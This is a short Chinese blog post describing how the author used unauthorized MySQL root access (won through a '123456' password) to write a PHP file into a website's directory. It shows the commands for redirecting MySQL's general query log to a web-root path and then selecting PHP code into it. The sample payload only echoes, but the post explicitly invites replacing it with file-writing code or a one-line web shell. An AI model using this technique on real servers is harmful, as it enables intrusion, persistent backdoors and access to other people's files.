今天偶尔得到一个 mysql 的 root 权限...(这个人密码就是 123456 我也是醉了)
然后我想看看他有什么文件,咋办呢?
#开启日志 set global general_log = on; #设置日志保存地址(比如:/wwwroot/xxx/test.php) set global general_log_file = '绝对路径'; #如果不知道绝对路径可以用这个命令看一下 show variables like "%char%"; #写出文件 select '<?php echo 1; ?>';
然后你访问那个你设置的保存路径就能看见啦.
比如说file_put_content()之类的 或者 一句话木马啥的都可以
KIENG.CN , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA 4.0协议进行授权
转载请注明出处:利用 MySQL 注入写出 PHP(ASP)文件
本文章链接:https://blog.kieng.cn/648.html
转载请注明出处:利用 MySQL 注入写出 PHP(ASP)文件
本文章链接:https://blog.kieng.cn/648.html
Windows 10 | 
Chrome 69.0.3497.100